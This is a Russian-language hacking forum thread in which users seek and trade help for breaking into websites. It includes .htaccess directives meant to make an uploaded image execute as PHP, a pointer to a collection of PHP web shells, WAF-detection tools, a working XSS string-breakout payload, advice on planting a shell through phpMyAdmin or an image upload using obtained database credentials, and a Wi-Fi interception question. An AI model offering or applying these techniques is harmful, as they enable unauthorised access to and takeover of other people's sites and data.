.htaccess заливается, но "AddType application/x-httpd-php .jpg" не помогает, файл просто скачивается (если залить без htaccessa, то jpg открывается). Я так понимаю, тут 2 варианта 1. CHMOD, 2. htaccess в каталоге выше. Пробовал и "RewriteRule (?:^|/)1\.jpg$ - [T=application/x-httpd-php]", результат то же. Пробовал прописывать в хтачесе редиректы на другие каталоги и заливаться, но безуспешно, видимо, не хватает прав.

Собственно вопрос: если это чмод, могу ли я как-то через htaccess, например, прочитать исходники? По типу работы этого редиректа: RewriteRule ^1\.jpg$ /%{QUERY_STRING} [NC,L].Либо, если это второй вариант, отменить все условия htaccess в каталогах выше?

ExQ
07.02.2022, 18:01
какие шеллы попроще wso есть ?

karkajoi
07.02.2022, 18:40
↑ (https://antichat.live/posts/4489773/)
какие шеллы попроще wso есть ?


Их целая куча https://github.com/tennc/webshell/tree/master/php

Gigggs
08.02.2022, 15:08
Всем Добра!

Подскажите пожалуйста аналог WhatWaf , может есть что по новее , или аналоги , я понимаю что руками в основном обходят сейчас , но если не трудно подскажите пожалуйста , или может можно ее как то дополнить обновлениями.

Спасибо!

Baskin-Robbins
08.02.2022, 21:04
↑ (https://antichat.live/posts/4489852/)
Всем Добра!
Подскажите пожалуйста аналог WhatWaf , может есть что по новее , или аналоги , я понимаю что руками в основном обходят сейчас , но если не трудно подскажите пожалуйста , или может можно ее как то дополнить обновлениями.
Спасибо!


есть такой еще

https://github.com/EnableSecurity/wafw00f

Octavian
09.03.2022, 17:05
Привет помогите что можно сделать, нахожусь в пропускает <> без " как мне закрыть этот и выполнить XSS



var a = "asdf...";


а если с пробелом тогда норм но уже не работает



var a = "alert(9)//";

BigBear
10.03.2022, 21:21
↑ (https://antichat.live/posts/4492071/)
Привет помогите что можно сделать, нахожусь в пропускает <> без " как мне закрыть этот и выполнить XSS


var a = "asdf...";


а если с пробелом тогда норм но уже не работает


var a = "alert(9)//";




Судя по всему, ты полностью контролируешь переменную "a".

Тогда проще всего будет сделать инжект внутри , ты же уже там.

Попробуй payload =


a"+alert(100)+"b

Чтобы получилось



var a = "a"+alert(100)+"b";

Octavian
10.03.2022, 21:54
↑ (https://antichat.live/posts/4492171/)
Судя по всему, ты полностью контролируешь переменную "a".
Тогда проще всего будет сделать инжект внутри , ты же уже там.
Попробуй payload =

a"+alert(100)+"b

Чтобы получилось


var a = "a"+alert(100)+"b";




нахожусь в пропускает <> без "

viper710
19.07.2022, 10:53
Добрый день.

Подскажите пожалуйста, как лучше сделать. Имею доступ к базе данных ( логин/пароль есть). Пытаюсь залить шелл по: /threads/307894/ (https://antichat.live/threads/307894/)

Но возникает проблема в phpmyadmin "Ошибка в запросe (1045): Access denied for user..."

Пробую залить шелл с картинкой вместе через админку сайта, но при заливке картинки двиг перезаписывает картинку и открыть я ее не могу, маленький квадратик. Хотя код в картинке сохранен.

KIR@PRO
28.07.2022, 06:51
↑ (https://antichat.live/posts/4500782/)
Добрый день.
Подскажите пожалуйста, как лучше сделать. Имею доступ к базе данных ( логин/пароль есть). Пытаюсь залить шелл по:
/threads/307894/ (https://antichat.live/threads/307894/)
Но возникает проблема в phpmyadmin "Ошибка в запросe (1045): Access denied for user..."
Пробую залить шелл с картинкой вместе через админку сайта, но при заливке картинки двиг перезаписывает картинку и открыть я ее не могу, маленький квадратик. Хотя код в картинке сохранен.


1) учетка от базы не имеет file_priv

2) "но при заливке картинки двиг перезаписывает картинку и открыть я ее не могу" - попробуйте описать более внятно ))) не совсем понятно что означает "перезаписывает", если дальше пишете что "код в картинке сохранен"... Не достаточно просто иметь в картинке код. Необходимо что бы его интерпретировал движок или библиотека которой обрабатывается картинка. Если этого не происходит, то и код не выполнится. К тому же зачастую, из картинок удаляется всё "лишнее" перед сохранением.

vremy9nkov
14.08.2022, 18:30
Есть ли в Airslax 6.2 автопоиск и перехват наподоби как был в 5.2 ?

если есть, то где найти этот пункт...